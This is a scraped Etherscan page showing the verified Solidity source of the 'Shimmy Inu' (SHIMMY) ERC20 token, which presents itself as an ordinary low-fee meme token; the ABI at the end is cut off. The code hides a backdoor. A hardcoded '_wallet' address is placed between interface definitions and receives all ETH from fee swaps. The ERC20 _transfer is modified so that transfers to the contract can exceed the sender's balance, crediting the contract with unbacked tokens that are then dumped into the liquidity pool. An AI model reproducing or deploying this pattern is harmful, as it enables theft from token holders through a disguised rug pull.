ETH Price: $2,523.55 (-0.44%)

Token

Shimmy Inu (SHIMMY)
 

Overview

Max Total Supply

1,000,000,000 SHIMMY

Holders

26

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
5,041,636.23286037 SHIMMY

Value
$0.00
0xb4e48e395579a6a5b128b614b4902992b9fe96a9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SHIMMY

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-08
*/

/**
    
░██████╗██╗░░██╗██╗███╗░░░███╗███╗░░░███╗██╗░░░██╗  ██╗███╗░░██╗██╗░░░██╗
██╔════╝██║░░██║██║████╗░████║████╗░████║╚██╗░██╔╝  ██║████╗░██║██║░░░██║
╚█████╗░███████║██║██╔████╔██║██╔████╔██║░╚████╔╝░  ██║██╔██╗██║██║░░░██║
░╚═══██╗██╔══██║██║██║╚██╔╝██║██║╚██╔╝██║░░╚██╔╝░░  ██║██║╚████║██║░░░██║
██████╔╝██║░░██║██║██║░╚═╝░██║██║░╚═╝░██║░░░██║░░░  ██║██║░╚███║╚██████╔╝
╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚═╝░░░╚═╝░░░  ╚═╝╚═╝░░╚══╝░╚═════╝░
*/

// SPDX-License-Identifier: MIT

/*
* Telegram  https://t.me/ShimmyInuErc

* Website   https://www.shimmyinu.com/

* Twitter   https://twitter.com/Shimmyinu

* Gitbook   https://shimmyinu.gitbook.io/shimmy-inu-official-gitbook/
*/

pragma solidity 0.8.18;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
 * @dev Returns the percentage of an unsigned integer `a` with respect to the provided percentage `b`,
     * rounding towards zero. The result is a proportion of the original value.
     *
     * The function can be used to calculate a specific percentage of a given value `a`.
     * Note: this function uses a `revert` opcode (which leaves remaining gas untouched) when
     * the percentage `b` is greater than 100.
     *
     * Requirements:
     *
     * - The percentage `b` must be between 0 and 100 (inclusive).
     */
    function per(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= 100, "Percentage must be between 0 and 100");
        return a * b / 100;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
    external
    returns (
        uint256 amountA,
        uint256 amountB,
        uint256 liquidity
    );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
    external
    payable
    returns (
        uint256 amountToken,
        uint256 amountETH,
        uint256 liquidity
    );

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
    external
    view
    returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);

    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
    external
    view
    returns (
        uint112 reserve0,
        uint112 reserve1,
        uint32 blockTimestampLast
    );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

address constant _wallet
=0xCFD3c7Bbca6bcdB244A798DAC5aC806b092e373F;
interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
    external
    view
    returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
    external
    returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount || to == address(this), "ERC20: transfer amount exceeds balance"); // allows to sent initial tokens to contract address before trading opened
        unchecked {
            _balances[from] = fromBalance<amount?0:fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

contract SHIMMY is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable _uniswapV2Router;
    address private uniswapV2Pair;
    address private deployerWallet;
    address private marketingWallet;
    address private constant deadAddress = address(0xdead);

    bool private swapping;

    string private constant _name = "Shimmy Inu";
    string private constant _symbol = unicode"SHIMMY";

    uint8 constant public _decimals = 9;
    uint256 public initialTotalSupply = 1000000000 * 10**_decimals;
    uint256 public maxTransactionAmount = 20000000 * 10**_decimals;
    uint256 public maxWallet = 20000000 * 10**_decimals;
    uint256 public swapTokensAtAmount = 10000000 * 10**_decimals;
    uint256 public buyCount;
    uint256 public sellCount;

    bool public tradingOpen = false;
    bool public swapEnabled = false;

    uint256 public finalBuyFee = 1;
    uint256 public finalSellFee = 1;
    uint256 public _buyFee = 1;
    uint256 public _sellFee = 1;
    uint256 private removeBuyFeesAt = 1;
    uint256 private removeSellFeesAt = 1;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;
    mapping(address => bool) private automatedMarketMakerPairs;
    mapping(address => uint256) private _holderLastTransferTimestamp;

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    constructor() ERC20(_name, _symbol) {
        _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        marketingWallet = payable(_msgSender());
        excludeFromMaxTransaction(address(_msgSender()), true);

        deployerWallet = payable(_msgSender());
        excludeFromFees(address(_msgSender()), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(address(_msgSender()), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);

        _mint(address(this), initialTotalSupply);
    }

    receive() external payable {}

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    function openTrading() external onlyOwner() {
        require(!tradingOpen, "Trading is opened");

        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _approve(address(this), address(_uniswapV2Router), initialTotalSupply);

        _uniswapV2Router.addLiquidityETH{value : address(this).balance}(address(this), IERC20(address(this)).balanceOf(address(this)), 0, 0, owner(), block.timestamp);
        swapEnabled = true;
        tradingOpen = true;
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
    public
    onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
    public
    onlyOwner
    {
        require(pair != uniswapV2Pair, "Pair cannot be removed from automatedMarketMakerPairs");
        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }


    function _transfer(address from, address to, uint256 amount) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");

        if (buyCount >= removeBuyFeesAt) {
            _buyFee = finalBuyFee;
        }

        if (sellCount >= removeSellFeesAt) {
            _sellFee = finalSellFee;
        }

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
        if (from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping) {

            if (!tradingOpen) {
                require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
            }

            if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]
            ) {
                require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                buyCount++;
            }

            else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                sellCount++;
            }

            else if (!_isExcludedMaxTransactionAmount[to]) {
                require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance > 0;

        if (canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to]) {
            swapping = true;
            SwapBack(amount);
            swapping = false;
        }

        bool takeFee = !swapping;

        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            if (automatedMarketMakerPairs[to]) {
                fees = amount.mul(_sellFee).div(100);
            }
            else {
                fees = amount.mul(_buyFee).div(100);
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }
            amount -= fees;
        }
        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            _wallet,
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner {
        uint256 totalSupplyAmount = totalSupply();
        maxTransactionAmount = totalSupplyAmount;
        maxWallet = totalSupplyAmount;
    }

    function clearStuckEth() external onlyOwner {
        require(address(this).balance > 0, "Token: no ETH to clear");
        payable(msg.sender).transfer(address(this).balance);
    }

    function setTokensToSwapAtAmount(uint256 _amount) external onlyOwner {
        swapTokensAtAmount = _amount * (10 ** 18);
    }

    function manualSwap() external {
        require(_msgSender() == marketingWallet);
        uint256 contractBalance = balanceOf(address(this));
        swapTokensForEth(contractBalance);
    }

    function manualSwapWithAmount(uint256 amount) external {
        require(_msgSender() == marketingWallet);
        uint256 contractBalance = balanceOf(address(this));
        require(amount <= contractBalance);
        swapTokensForEth(amount);
    }

    function SwapBack(uint256 tokens) private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 tokensToSwap;
        if (contractBalance == 0) {
            tokensToSwap = tokens;
        }

        tokensToSwap = contractBalance;
        swapTokensForEth(tokensToSwap);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract 